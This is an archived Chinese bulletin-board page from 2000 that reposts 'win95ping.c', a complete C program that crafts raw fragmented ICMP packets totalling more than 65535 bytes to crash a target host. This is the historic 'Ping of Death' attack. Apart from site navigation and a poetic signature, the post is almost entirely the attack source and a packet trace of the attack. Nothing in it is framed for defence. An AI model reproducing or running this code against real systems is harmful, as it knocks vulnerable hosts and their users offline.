📄 457.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="458.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>
标 题: win95ping.c <br>
发信站: 武汉白云黄鹤站 (Mon Apr 10 11:52:49 2000), 站内信件 <br>
<br>
/* <br>
* win95ping.c <br>
* <br>
* Simulate the evil win95 "ping -l 65510 buggyhost". <br>
* version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996 <br>
* <br>
* This requires raw sockets that don't mess with the packet at all (other <br>
* than adding the checksum). That means that SunOS, Solaris, and <br>
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD, <br>
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux <br>
* system to try it on. compile with -DREALLY_RAW. <br>
* <br>
* The attack from the Win95 box looks like: <br>
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+) <br>
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+) <br>
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+) <br>
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+) <br>
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+) <br>
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+) <br>
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+) <br>
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+) <br>
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+) <br>
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+) <br>
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+) <br>
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+) <br>
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+) <br>
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+) <br>
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+) <br>
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+) <br>
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+) <br>
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+) <br>
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+) <br>
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+) <br>
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+) <br>
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+) <br>
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+) <br>
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+) <br>
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+) <br>
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+) <br>
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+) <br>
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+) <br>
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+) <br>
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+) <br>
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+) <br>
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+) <br>
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+) <br>
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+) <br>
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+) <br>
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+) <br>
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+) <br>
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+) <br>
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+) <br>
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+) <br>
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+) <br>
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+) <br>
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+) <br>
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+) <br>
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120) <br>
* <br>
*/ <br>
<br>
#include <stdio.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netdb.h> <br>
#include <netinet/in.h> <br>
#include <netinet/in_systm.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_icmp.h> <br>
<br>
/* <br>
* If your kernel doesn't muck with raw packets, #define REALLY_RAW. <br>
* This is probably only Linux. <br>
*/ <br>
#ifdef REALLY_RAW <br>
#define FIX(x) htons(x) <br>
#else <br>
#define FIX(x) (x) <br>
#endif <br>
<br>
int <br>
main(int argc, char **argv) <br>
{ <br>
int s; <br>
char buf[1500]; <br>
struct ip *ip = (struct ip *)buf; <br>
struct icmp *icmp = (struct icmp *)(ip + 1); <br>
struct hostent *hp; <br>
struct sockaddr_in dst; <br>
int offset; <br>
int on = 1; <br>
<br>
bzero(buf, sizeof buf); <br>
<br>
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) { <br>
perror("socket"); <br>
exit(1); <br>
} <br>
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { <br>
perror("IP_HDRINCL"); <br>
exit(1); <br>
} <br>
if (argc != 2) { <br>
fprintf(stderr, "usage: %s hostname\n", argv[0]); <br>
exit(1); <br>
} <br>
if ((hp = gethostbyname(argv[1])) == NULL) { <br>
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) { <br>
fprintf(stderr, "%s: unknown host\n", argv[1]); <br>
} <br>
} else { <br>
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); <br>
} <br>
printf("Sending to %s\n", inet_ntoa(ip->ip_dst)); <br>
ip->ip_v = 4; <br>
ip->ip_hl = sizeof *ip >> 2; <br>
ip->ip_tos = 0; <br>
ip->ip_len = FIX(sizeof buf); <br>
ip->ip_id = htons(4321); <br>
ip->ip_off = FIX(0); <br>
ip->ip_ttl = 255; <br>
ip->ip_p = 1; <br>
ip->ip_sum = 0; /* kernel fills in */ <br>
ip->ip_src.s_addr = 0; /* kernel fills in */ <br>
<br>
dst.sin_addr = ip->ip_dst; <br>
dst.sin_family = AF_INET; <br>
<br>
icmp->icmp_type = ICMP_ECHO; <br>
icmp->icmp_code = 0; <br>
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); <br>
/* the checksum of all 0's is easy to compute */ <br>
<br>
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { <br>
ip->ip_off = FIX(offset >> 3); <br>
if (offset < 65120) <br>
ip->ip_off |= FIX(IP_MF); <br>
else <br>
ip->ip_len = FIX(418); /* make total 65538 */ <br>
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst, <br>
sizeof dst) < 0) { <br>
fprintf(stderr, "offset %d: ", offset); <br>
perror("sendto"); <br>
} <br>
if (offset == 0) { <br>
icmp->icmp_type = 0; <br>
icmp->icmp_code = 0; <br>
icmp->icmp_cksum = 0; <br>
} <br>
} <br>
} <br>
<br>
-- <br>
我问飘逝的风:来迟了? <br>
风感慨:是的,他们已经宣战。 <br>
我问苏醒的大地:还有希望么? <br>
大地揉了揉眼睛:还有,还有无数代的少年。 <br>
我问长空中的英魂:你们相信? <br>
英魂带着笑意离去:相信,希望还在。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="458.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -